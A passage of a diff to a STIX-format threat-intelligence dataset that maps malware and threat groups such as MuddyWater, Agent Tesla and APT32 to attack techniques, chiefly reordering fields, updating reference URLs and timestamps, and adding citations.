"url": "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/"
}
],
- "source_ref": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5"
},
{
"id": "relationship--4b23ac99-3761-46f0-ad5d-2cf63a95036a",
@@ -112862,12 +114061,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99"
}
],
- "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4"
},
{
"id": "relationship--77b9e1c5-8241-4260-8125-4bc2e1206b9c",
@@ -112968,7 +114167,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -112976,7 +114175,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.344Z",
+ "modified": "2020-06-22T17:54:16.033Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -113208,12 +114407,12 @@
"url": "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A"
}
],
- "source_ref": "malware--11e36d5b-6a92-4bf9-8eb7-85eb24f59e22",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--11e36d5b-6a92-4bf9-8eb7-85eb24f59e22",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--a802d52a-01f4-44c8-b80d-d2c746e1e31d",
@@ -113355,12 +114554,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18"
},
{
"id": "relationship--79958f80-16ca-4287-b691-9c748d6baf66",
@@ -113775,27 +114974,6 @@
"modified": "2020-03-17T02:22:39.568Z",
"created": "2018-10-17T00:14:20.652Z"
},
- {
- "id": "relationship--e9b0af76-f6b1-43b0-ac0e-ea23582f575b",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--7636484c-adc5-45d4-9bfe-c3e062fbc4a0",
- "relationship_type": "uses",
- "target_ref": "malware--e48df773-7c95-4a4c-ba70-ea3d15900148",
- "external_references": [
- {
- "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf",
- "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.",
- "source_name": "ClearSky Charming Kitten Dec 2017"
- }
- ],
- "description": "(Citation: ClearSky Charming Kitten Dec 2017)",
- "type": "relationship",
- "modified": "2019-03-22T19:59:49.430Z",
- "created": "2018-01-16T16:13:52.465Z"
- },
{
"id": "relationship--318afc9f-92f3-4262-af70-b2e045b87737",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -113852,12 +115030,12 @@
"url": "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
}
],
- "source_ref": "malware--b1de6916-7a22-4460-8d26-6b5483ffaa2a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--b1de6916-7a22-4460-8d26-6b5483ffaa2a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4"
},
{
"id": "relationship--ab7eb363-c775-4065-a80d-1b324f22d0b8",
@@ -114126,12 +115304,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
}
],
- "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00"
},
{
"id": "relationship--cc5a6d27-5c74-4f53-afc1-390c71bfae7c",
@@ -114679,7 +115857,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -114688,7 +115866,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.315Z",
+ "modified": "2020-04-16T19:41:40.704Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -114705,12 +115883,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3909-99"
}
],
- "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add"
},
{
"id": "relationship--1bc5328a-e079-4478-9d04-d840626d4976",
@@ -114773,12 +115951,12 @@
"url": "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
}
],
- "source_ref": "malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--a29d9514-3284-4ac2-a93a-e17750519534",
@@ -114937,14 +116115,14 @@
"target_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
"external_references": [
{
- "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
+ "source_name": "Symantec Waterbug",
"description": "Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.",
- "source_name": "Symantec Waterbug"
+ "url": "https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1"
}
],
"description": "(Citation: Symantec Waterbug)",
"type": "relationship",
- "modified": "2019-07-14T21:04:45.836Z",
+ "modified": "2020-06-29T13:27:46.711Z",
"created": "2017-05-31T21:33:27.046Z"
},
{
@@ -115340,27 +116518,6 @@
"modified": "2019-09-03T18:50:16.552Z",
"created": "2017-12-14T16:46:06.044Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "Talos Agent Tesla Oct 2018",
- "url": "https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html",
- "description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018."
- }
- ],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) exploits CVE-2017-11882 in Microsoft\u2019s Equation Editor to execute a process.(Citation: Talos Agent Tesla Oct 2018)",
- "id": "relationship--3f60930f-e055-4a83-b8a5-fa84c139ee5b",
- "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "type": "relationship",
- "modified": "2019-04-16T14:30:35.428Z",
- "created": "2019-01-29T18:44:04.945Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -115712,14 +116869,14 @@
"source_name": "iSIGHT Sandworm 2014"
},
{
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
"source_name": "F-Secure BlackEnergy 2014"
}
],
"description": "(Citation: iSIGHT Sandworm 2014)(Citation: F-Secure BlackEnergy 2014)",
"type": "relationship",
- "modified": "2019-03-25T16:55:26.213Z",
+ "modified": "2020-06-02T16:14:00.643Z",
"created": "2017-05-31T21:33:27.070Z"
},
{
@@ -115752,16 +116909,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.722Z",
+ "modified": "2020-04-21T23:09:31.613Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -115799,12 +116956,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
}
],
- "source_ref": "malware--ad4f146f-e3ec-444a-ba71-24bffd7f0f8e",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--ad4f146f-e3ec-444a-ba71-24bffd7f0f8e",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--921c2a85-eab7-4cfc-9ac5-98a463262c17",
@@ -116109,15 +117266,20 @@
"description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
"source_name": "TrendMicro Tropic Trooper Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) uses SSL to connect to C2 servers.(Citation: TrendMicro Tropic Trooper Mar 2018)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used SSL to connect to C2 servers.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--6a8356c2-5a79-40b7-bb8e-b7d9dffbe523",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
"type": "relationship",
- "modified": "2020-03-21T00:37:48.781Z",
+ "modified": "2020-05-21T18:57:34.313Z",
"created": "2019-01-29T20:17:49.316Z"
},
{
@@ -116630,18 +117792,23 @@
"source_name": "Securelist MuddyWater Oct 2018"
},
{
- "source_name": "Talos MuddyWater May 2019",
+ "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.",
"url": "https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html",
- "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019."
+ "source_name": "Talos MuddyWater May 2019"
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can collect the victim\u2019s OS version and machine name.(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can collect the victim\u2019s OS version and machine name.(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)",
"id": "relationship--9c5c8dbe-ec34-46f9-b4af-0a6e73f00c89",
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-06-28T15:30:58.850Z",
+ "modified": "2020-05-18T19:04:38.075Z",
"created": "2019-01-30T17:33:41.085Z"
},
{
@@ -116755,18 +117922,23 @@
],
"external_references": [
{
- "description": "Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018.",
+ "source_name": "Talos Konni May 2017",
"url": "https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
- "source_name": "Talos Konni May 2017"
+ "description": "Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
}
],
- "description": "[KONNI](https://attack.mitre.org/software/S0356) can gather the OS version, architecture information, connected drives, hostname, and computer name from the victim\u2019s machine.(Citation: Talos Konni May 2017)",
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) can gather the OS version, architecture information, connected drives, hostname, and computer name from the victim\u2019s machine and has used systeminfo.exe to get a snapshot of the current system state of the target machine.(Citation: Talos Konni May 2017)(Citation: Medium KONNI Jan 2020)",
"id": "relationship--172da5b1-cf68-468a-8208-b15ea5c813dc",
"source_ref": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-07-26T18:47:19.504Z",
+ "modified": "2020-04-28T18:12:13.776Z",
"created": "2019-01-31T00:36:41.034Z"
},
{
@@ -117270,12 +118442,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99"
}
],
- "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0"
},
{
"id": "relationship--ed45fb1c-048a-4378-8c15-6f6ea0c72d7a",
@@ -117579,12 +118751,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
}
],
- "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b"
},
{
"id": "relationship--4eec017c-8bf2-4eda-8c92-15926fc7e5aa",
@@ -117690,27 +118862,6 @@
"modified": "2020-03-17T17:00:43.701Z",
"created": "2018-10-17T00:14:20.652Z"
},
- {
- "id": "relationship--0179577d-b2a2-42b7-9f5e-944e5bf75d92",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Pupy](https://attack.mitre.org/software/S0192) can use Obfs3, a pluggable transport, to add another layer of encryption and obfuscate TLS.(Citation: GitHub Pupy)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "url": "https://github.com/n1nj4sec/pupy",
- "description": "Nicolas Verdier. (n.d.). Retrieved January 29, 2018.",
- "source_name": "GitHub Pupy"
- }
- ],
- "source_ref": "tool--cb69b20d-56d0-41ab-8440-4a4b251614d4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
- "type": "relationship",
- "modified": "2020-03-23T16:58:25.255Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--2e367a09-1d94-4ea4-984c-a592b769fffa",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -117777,15 +118928,15 @@
{
"id": "relationship--e8a77e9f-594d-429a-9eb0-51502af84c14",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used PowerShell for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Talos MuddyWater May 2019)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used PowerShell for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "FireEye MuddyWater Mar 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+ "source_name": "FireEye MuddyWater Mar 2018"
},
{
"source_name": "MuddyWater TrendMicro June 2018",
@@ -117798,26 +118949,31 @@
"source_name": "Securelist MuddyWater Oct 2018"
},
{
- "source_name": "Symantec MuddyWater Dec 2018",
+ "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
"url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group",
- "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018."
+ "source_name": "Symantec MuddyWater Dec 2018"
},
{
- "source_name": "ClearSky MuddyWater Nov 2018",
+ "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
- "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018."
+ "source_name": "ClearSky MuddyWater Nov 2018"
},
{
- "source_name": "Talos MuddyWater May 2019",
+ "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.",
"url": "https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html",
- "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019."
+ "source_name": "Talos MuddyWater May 2019"
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
"type": "relationship",
- "modified": "2019-06-28T15:30:59.020Z",
+ "modified": "2020-05-18T19:04:38.145Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -117897,12 +119053,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
}
],
- "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -117932,23 +119088,28 @@
],
"external_references": [
{
- "source_name": "Fortinet Agent Tesla April 2018",
+ "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.",
"url": "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
- "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018."
+ "source_name": "Fortinet Agent Tesla April 2018"
},
{
"source_name": "Fortinet Agent Tesla June 2017",
"url": "https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html",
"description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) collects the system's computer name and also has the capability to collect information on the processor, memory, and video card from the system.(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the system's computer name and also has the capability to collect information on the processor, memory, OS, and video card from the system.(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Malwarebytes Agent Tesla April 2020)",
"id": "relationship--b509e591-b086-4631-a9ba-5a5dc80de8d0",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-04-16T14:30:35.435Z",
+ "modified": "2020-05-28T23:41:03.868Z",
"created": "2019-01-29T18:44:04.927Z"
},
{
@@ -118080,7 +119241,7 @@
{
"id": "relationship--4f13e788-b0da-457d-89b1-64196c9627b8",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017) The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder).(Citation: ESET OceanLotus Mar 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder).(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -118105,7 +119266,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
"type": "relationship",
- "modified": "2019-07-17T13:11:38.711Z",
+ "modified": "2020-06-19T20:04:12.612Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -118206,16 +119367,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.728Z",
+ "modified": "2020-04-21T23:09:31.576Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -118489,12 +119650,12 @@
